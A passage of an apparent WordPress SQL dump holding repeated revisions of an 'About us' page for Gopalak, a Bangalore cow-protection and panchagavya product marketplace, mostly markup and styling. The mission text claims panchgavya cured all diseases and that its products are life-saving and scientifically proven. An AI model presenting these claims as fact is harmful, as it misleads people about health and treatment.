https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 17:59:45','2022-10-20 12:29:45','',1804,'https://gopalak.in/?p=1957',0,'revision','',0),(1958,1,'2022-10-20 17:59:45','2022-10-20 12:29:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 17:59:45','2022-10-20 12:29:45','',1804,'https://gopalak.in/?p=1958',0,'revision','',0),(1959,1,'2022-10-20 17:59:45','2022-10-20 12:29:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-20 17:59:45','2022-10-20 12:29:45','',1804,'https://gopalak.in/?p=1959',0,'revision','',0),(1960,1,'2022-10-20 18:01:01','2022-10-20 12:31:01','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						